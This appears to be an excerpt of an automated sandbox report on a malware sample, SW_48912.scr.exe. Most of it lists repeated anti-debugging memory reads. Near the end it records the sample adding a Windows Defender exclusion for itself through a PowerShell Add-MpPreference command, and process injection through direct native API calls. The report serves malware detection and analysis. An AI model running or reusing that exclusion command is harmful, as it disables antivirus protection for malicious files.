                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013EA2C3 mov eax, dword ptr fs:[00000030h]5_2_013EA2C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F0535 mov eax, dword ptr fs:[00000030h]5_2_013F0535
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141656A mov eax, dword ptr fs:[00000030h]5_2_0141656A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141656A mov eax, dword ptr fs:[00000030h]5_2_0141656A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141656A mov eax, dword ptr fs:[00000030h]5_2_0141656A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476500 mov eax, dword ptr fs:[00000030h]5_2_01476500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4500 mov eax, dword ptr fs:[00000030h]5_2_014B4500
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8550 mov eax, dword ptr fs:[00000030h]5_2_013E8550
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E8550 mov eax, dword ptr fs:[00000030h]5_2_013E8550
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E53E mov eax, dword ptr fs:[00000030h]5_2_0140E53E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E5CF mov eax, dword ptr fs:[00000030h]5_2_0141E5CF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E5CF mov eax, dword ptr fs:[00000030h]5_2_0141E5CF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A5D0 mov eax, dword ptr fs:[00000030h]5_2_0141A5D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A5D0 mov eax, dword ptr fs:[00000030h]5_2_0141A5D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140E5E7 mov eax, dword ptr fs:[00000030h]5_2_0140E5E7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C5ED mov eax, dword ptr fs:[00000030h]5_2_0141C5ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141C5ED mov eax, dword ptr fs:[00000030h]5_2_0141C5ED
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2582 mov eax, dword ptr fs:[00000030h]5_2_013E2582
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2582 mov ecx, dword ptr fs:[00000030h]5_2_013E2582
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01414588 mov eax, dword ptr fs:[00000030h]5_2_01414588
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E59C mov eax, dword ptr fs:[00000030h]5_2_0141E59C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E25E0 mov eax, dword ptr fs:[00000030h]5_2_013E25E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014605A7 mov eax, dword ptr fs:[00000030h]5_2_014605A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014605A7 mov eax, dword ptr fs:[00000030h]5_2_014605A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014605A7 mov eax, dword ptr fs:[00000030h]5_2_014605A7
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E65D0 mov eax, dword ptr fs:[00000030h]5_2_013E65D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014045B1 mov eax, dword ptr fs:[00000030h]5_2_014045B1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014045B1 mov eax, dword ptr fs:[00000030h]5_2_014045B1
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141E443 mov eax, dword ptr fs:[00000030h]5_2_0141E443
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140245A mov eax, dword ptr fs:[00000030h]5_2_0140245A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC427 mov eax, dword ptr fs:[00000030h]5_2_013DC427
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE420 mov eax, dword ptr fs:[00000030h]5_2_013DE420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE420 mov eax, dword ptr fs:[00000030h]5_2_013DE420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE420 mov eax, dword ptr fs:[00000030h]5_2_013DE420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A456 mov eax, dword ptr fs:[00000030h]5_2_0149A456
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146C460 mov ecx, dword ptr fs:[00000030h]5_2_0146C460
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140A470 mov eax, dword ptr fs:[00000030h]5_2_0140A470
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140A470 mov eax, dword ptr fs:[00000030h]5_2_0140A470
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140A470 mov eax, dword ptr fs:[00000030h]5_2_0140A470
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418402 mov eax, dword ptr fs:[00000030h]5_2_01418402
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418402 mov eax, dword ptr fs:[00000030h]5_2_01418402
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01418402 mov eax, dword ptr fs:[00000030h]5_2_01418402
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D645D mov eax, dword ptr fs:[00000030h]5_2_013D645D
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466420 mov eax, dword ptr fs:[00000030h]5_2_01466420
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E64AB mov eax, dword ptr fs:[00000030h]5_2_013E64AB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149A49A mov eax, dword ptr fs:[00000030h]5_2_0149A49A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E04E5 mov ecx, dword ptr fs:[00000030h]5_2_013E04E5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014144B0 mov ecx, dword ptr fs:[00000030h]5_2_014144B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146A4B0 mov eax, dword ptr fs:[00000030h]5_2_0146A4B0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141674D mov esi, dword ptr fs:[00000030h]5_2_0141674D
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01422750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01464755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146E75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E0710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141C700 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E8770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013F0770 mov eax, dword ptr fs:[00000030h] (12 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01410710 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E0750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0145C730 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141273C mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141273C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014607C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E07AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146E7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014027ED mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E47FB mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0148678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014947A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013EC7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013FE627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141A660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014A866E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013F260B mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01412674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0145E609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01422619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01416620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01418620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013FC640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E4690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0145E6F2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014606F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014166B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01460946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014B4940 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01406962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013D8918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0142096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0142096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01484978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146C97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0145E908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146C912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0147892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014769C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014149D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E09AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014AA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013F29A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146E9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014129F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013EA9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014689B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014689B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01410854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146E872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01476870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146C810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E4859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0148483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01402835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01402835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013F2840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0140E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014B08C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014AA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E0887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146C89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01494B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01476B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014AAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01488B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0148EB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014B2B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013DCB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014B4B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0145EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0140EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_014A8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013D8B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013F0BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01400BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0148EBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146CBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0140EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E8BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E0BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01494BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0148EA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0145CA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0146CA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013F0A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0140EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E6A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01404A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01436ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_01414AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013E8AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_0141AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Code function: 5_2_013EEA80 mov eax, dword ptr fs:[00000030h] (4 occurrences)
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\SW_48912.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_48912.scr.exe"
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
